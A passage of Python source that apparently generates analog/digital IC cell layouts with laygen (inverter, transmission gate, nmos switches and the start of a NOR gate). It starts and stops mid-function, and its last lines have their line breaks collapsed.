    laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0')
    laygen.via(None, np.array([0, 0]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0')
    ri0 = laygen.route("R"+objectname_pfix+"I0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0')
    laygen.via(None, np.array([0, 0]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m2m3)
    # output: extended M2 drain straps at pin_o_y on both rows, joined by M3
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, pin_o_y]), xy1=np.array([1, pin_o_y]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in1.name, refpinname1='D0', endstyle0='extend', endstyle1='extend')
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, pin_o_y]), xy1=np.array([1, pin_o_y]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0', endstyle0 = 'extend', endstyle1 = 'extend')
    ro0 = laygen.route("R" + objectname_pfix +"O0", laygen.layers['metal'][3], xy0=np.array([0, pin_o_y]), xy1=np.array([0, pin_o_y]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0')
# --- continuation of generate_inv_1x: output vias, rails, pins ---
    laygen.via(None, np.array([0, pin_o_y]), refinstname=in1.name, refpinname='D0', gridname=rg_m1m2)
    laygen.via(None, np.array([0, pin_o_y]), refinstname=ip1.name, refpinname='D0', gridname=rg_m1m2)
    laygen.via(None, np.array([0, pin_o_y]), refinstname=in1.name, refpinname='D0', gridname=rg_m2m3)
    laygen.via(None, np.array([0, pin_o_y]), refinstname=ip1.name, refpinname='D0', gridname=rg_m2m3)
    # power and ground rail
    xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0])
    rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip3.name)
    rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in3.name)
    # power and ground route: tie S0 of each row to its rail
    xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :]
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name)
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstname1=ip1.name)
    laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2)
    laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2)
    # pin
    if create_pin == True:
        create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I', 'O'], rect_list=[ri0, ro0])
        create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss)

def generate_tgate(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3,
                   routing_grid_m1m2_pin, routing_grid_m2m3_pin,
                   devname_nmos_boundary, devname_nmos_body, devname_nmos_space,
                   devname_pmos_boundary, devname_pmos_body, devname_pmos_space,
                   m=1, origin=np.array([0,0]), create_pin=False):
    """Generate a transmission-gate layout.

    Places nmos/pmos rows preceded by 2-wide space cells, straps the nmos
    gates (EN) and pmos gates (ENB) on M2 with vertical M3 stubs at tracks
    -3 and -2, shorts all sources as input I and all drains as output O
    (M3 verticals), draws M2 VDD/VSS rails, and optionally creates
    EN/ENB/I/O and power pins. m is halved (nf=2 devices), floored at 1.
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m1m2_pin = routing_grid_m1m2_pin
    rg_m2m3_pin = routing_grid_m2m3_pin
    m = max(1, int(m / 2)) # using nf=2 devices
    # placement
    in_space = laygen.place("I"+objectname_pfix+'NDMY', devname_nmos_space, pg, shape=np.array([2, 1]), xy=origin)
    in0 = laygen.relplace(name = "I" + objectname_pfix + 'N0', templatename = devname_nmos_boundary, gridname = pg, refinstname = in_space.name)
    in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1]))
    in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name)
    ip_space = laygen.relplace(name = "I"+objectname_pfix+'PDMY', templatename = devname_pmos_space, gridname = pg, refinstname = in_space.name, direction='top', transform='MX', shape=np.array([2, 1]))
    ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip_space.name, transform='MX')
    ip1 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1]))
    ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX')
    # route
    # en, enb: via every gate finger, M2 straps reaching 3 tracks into the space cells
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]))
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-3, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]))
    ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-3, 0]), xy1=np.array([-3, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0')
    laygen.via(None, np.array([-3, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3)
    renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-2, 0]), xy1=np.array([-2, 2]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0')
    laygen.via(None, np.array([-2, 0]), refinstname=ip1.name, refpinname='G0', gridname=rg_m2m3)
    # input: M2 source straps on both rows, M3 vertical at the first finger
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2)
    laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2)
    laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([0, 0]), gridname=rg_m2m3)
    laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='S0', refinstindex=np.array([0, 0]), gridname=rg_m2m3)
    ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S0', refinstindex1=np.array([0, 0]))
    # output: M2 drain straps one track up, M3 vertical at the last finger
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=ip1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
    for i in range(m):
        laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
        laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3)
    laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([m-1, 0]), gridname=rg_m2m3)
    ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([m-1, 0]), refinstname1=ip1.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]))
    # power and ground rail
    xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0])
    rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip_space.name, refinstname1=ip2.name)
    rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in_space.name, refinstname1=in2.name)
    # pin
    if create_pin == True:
        create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['EN', 'ENB', 'I', 'O'], rect_list=[ren0, renb0, ri0, ro0])
        create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss)

def generate_nsw(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3,
                 routing_grid_m1m2_pin, routing_grid_m2m3_pin,
                 devname_nmos_boundary, devname_nmos_body, devname_nmos_space,
                 devname_pmos_boundary, devname_pmos_body, devname_pmos_space,
                 m=1, origin=np.array([0,0]), create_pin=False):
    """Generate an nmos-type switch layout.

    Single nmos row; the mirrored "pmos" row is built entirely from space
    cells (no active pmos), so devname_pmos_boundary/body are accepted but
    unused here. Gate strap = EN (M3 stub at track -1), S1 pins tied up on
    M3 as input I, D0 pins as output O; both VDD and VSS M2 rails are drawn.
    m is halved (nf=2 devices), floored at 1.
    """
    #generate an nmos type switch
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m1m2_pin = routing_grid_m1m2_pin
    rg_m2m3_pin = routing_grid_m2m3_pin
    m = max(1, int(m / 2)) # using nf=2 devices
    # placement
    in0 = laygen.place("I" + objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin)
    in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1]))
    in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name)
    ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_space, gridname = pg, refinstname = in0.name, direction='top', transform='MX')
    ip1 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1]))
    ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_space, gridname = pg, refinstname = ip1.name, transform='MX')
    #ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_space, gridname = pg, refinstname = in0.name, direction='top', transform='MX')
    #ip1 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_space, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m*2, 1]))
    #ip2 = laygen.relplace(name = "I"+objectname_pfix+'P3', templatename = devname_pmos_space, gridname = pg, refinstname = ip1.name, transform='MX')
    # route
    # en, enb: gate strap with M3 stub at track -1
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]))
    ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0')
    laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3)
    # input: source strap on M2, one vertical M3 per finger collected in ri
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2)
    ri=[]
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([i, 0]), gridname=rg_m2m3)
        ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([i, 0]))
        ri.append(ri0)
    # output: drain strap one track up, one vertical M3 per finger collected in ro
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), endstyle0='extend', refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), endstyle1='extend')
    for i in range(m):
        laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    ro=[]
    for i in range(m):
        laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m2m3)
        ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0]))
        ro.append(ro0)
    # power and ground rail
    xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0])
    rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip2.name)
    rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name)
    # pin: only the first I/O vertical is exported as the pin shape
    if create_pin == True:
        create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['EN', 'I', 'O'], rect_list=[ren0, ri[0], ro[0]])
        create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss)

def generate_nsw_wovdd(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3,
                       routing_grid_m1m2_pin, routing_grid_m2m3_pin,
                       devname_nmos_boundary, devname_nmos_body, devname_nmos_space,
                       m=1, origin=np.array([0,0]), create_pin=False):
    """Generate an nmos-type switch layout without a VDD rail.

    Two mirrored nmos rows (in1 and in1b); both rows' gates, sources, and
    drains are routed the same way as generate_nsw, and both rails are VSS
    (pins VSS0/VSS1, netname 'VSS'). m is halved (nf=2 devices), floored
    at 1. (Body continues past this chunk's first part.)
    """
    #generate an nmos type switch, without vdd rail
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m1m2_pin = routing_grid_m1m2_pin
    rg_m2m3_pin = routing_grid_m2m3_pin
    m = max(1, int(m / 2)) # using nf=2 devices
    # placement
    in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin)
    in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1]))
    in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name)
    in0b= laygen.relplace(name = "I"+objectname_pfix+'N0B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX')
    in1b= laygen.relplace(name = "I"+objectname_pfix+'N2B', templatename = devname_nmos_body, gridname = pg, refinstname = in0b.name, transform='MX', shape=np.array([m, 1]))
    in2b= laygen.relplace(name = "I"+objectname_pfix+'N3B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1b.name, transform='MX')
    # route
    # en, enb: gate strap of the bottom row with M3 EN stub at track -1
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]))
    ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0')
    laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3)
    # gate strap of the mirrored top row
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1b.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1b.name, refpinname1='G0', refinstindex1=np.array([m-1, 0]))
# --- continuation of generate_nsw_wovdd: top-row gate via, I/O routes, rails, pins ---
    # NOTE(review): this M2-M3 via on in1b's G0 row has no matching M3 route
    # recorded in this body — presumably it lands on the EN stub above; confirm.
    laygen.via(None, np.array([-1, 0]), refinstname=in1b.name, refpinname='G0', gridname=rg_m2m3)
    # input: M2 source straps on both rows; bottom row's S1 verticals collected in ri
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2)
    ri=[]
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([i, 0]), gridname=rg_m2m3)
        ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S1', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([i, 0]))
        ri.append(ri0)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='S0', refinstindex0=np.array([0, 0]), refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]))
    for i in range(m):
        laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2)
    for i in range(m):
        # top row's S1 verticals are drawn but not collected (only the bottom row feeds the I pin)
        laygen.via(None, np.array([0, 0]), refinstname=in1b.name, refpinname='S1', refinstindex=np.array([i, 0]), gridname=rg_m2m3)
        laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='S1', refinstindex0=np.array([i, 0]), refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([i, 0]))
    # output: M2 drain straps one track up; bottom row's D0 verticals collected in ro
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='S0', refinstindex0=np.array([0, 0]), endstyle0='extend', refinstname1=in1.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), endstyle1='extend')
    for i in range(m):
        laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    ro=[]
    for i in range(m):
        laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m2m3)
        ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstindex0=np.array([i, 0]), refinstname1=in1.name, refpinname1='D0', refinstindex1=np.array([i, 0]))
        ro.append(ro0)
    laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1+1, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='S0', refinstindex0=np.array([0, 0]), endstyle0='extend', refinstname1=in1b.name, refpinname1='S1', refinstindex1=np.array([m-1, 0]), endstyle1='extend')
    for i in range(m):
        laygen.via(None, np.array([0, 1]), refinstname=in1b.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2)
    for i in range(m):
        laygen.via(None, np.array([0, 1]), refinstname=in1b.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m2m3)
        laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 4]), gridname0=rg_m2m3, refinstname0=in1b.name, refpinname0='D0', refinstindex0=np.array([i, 0]), refinstname1=in1b.name, refpinname1='D0', refinstindex1=np.array([i, 0]))
    # power and ground rail: both rails are VSS (no VDD in this cell)
    xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0])
    rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name)
    rvss2 = laygen.route("R"+objectname_pfix+"VSS1", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0b.name, refinstname1=in2b.name)
    # pin: both rails exported as separate pin shapes on the same 'VSS' net
    if create_pin == True:
        create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['EN', 'I', 'O'], rect_list=[ren0, ri[0], ro[0]])
        rvss_pin_xy = laygen.get_xy(obj = rvss, gridname = rg_m1m2)
        rvss2_pin_xy = laygen.get_xy(obj = rvss2, gridname = rg_m1m2)
        laygen.pin(name='VSS0', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2, netname='VSS')
        laygen.pin(name='VSS1', layer=laygen.layers['pin'][2], xy=rvss2_pin_xy, gridname=rg_m1m2, netname='VSS')

def generate_nor(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3,
                 routing_grid_m1m2_pin, routing_grid_m2m3_pin,
                 devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body,
                 m=1, origin=np.array([0,0]), create_pin=False):
    """Generate a NOR gate layout.

    Places two nmos body groups (boundary-body-boundary-boundary-body-
    boundary) for the two inputs. Definition continues beyond this chunk.
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m1m2_pin = routing_grid_m1m2_pin
    rg_m2m3_pin = routing_grid_m2m3_pin
    m=max(1, int(m/2)) #using nf=2 devices
    # placement
    in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin)
    in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1]))
    in2 = laygen.relplace(name = "I" + objectname_pfix + 'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name)
    in3 = laygen.relplace(name = "I" + objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name)
    in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_body, gridname = pg, refinstname = in3.name, shape=np.array([m, 1]))
    in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_boundary, gridname = pg, refinstname = in4.name)
    ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0',
templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_body, gridname = pg, refinstname = ip3.name, transform='MX', shape=np.array([m, 1])) ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip4.name, transform='MX') # route # b0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, 
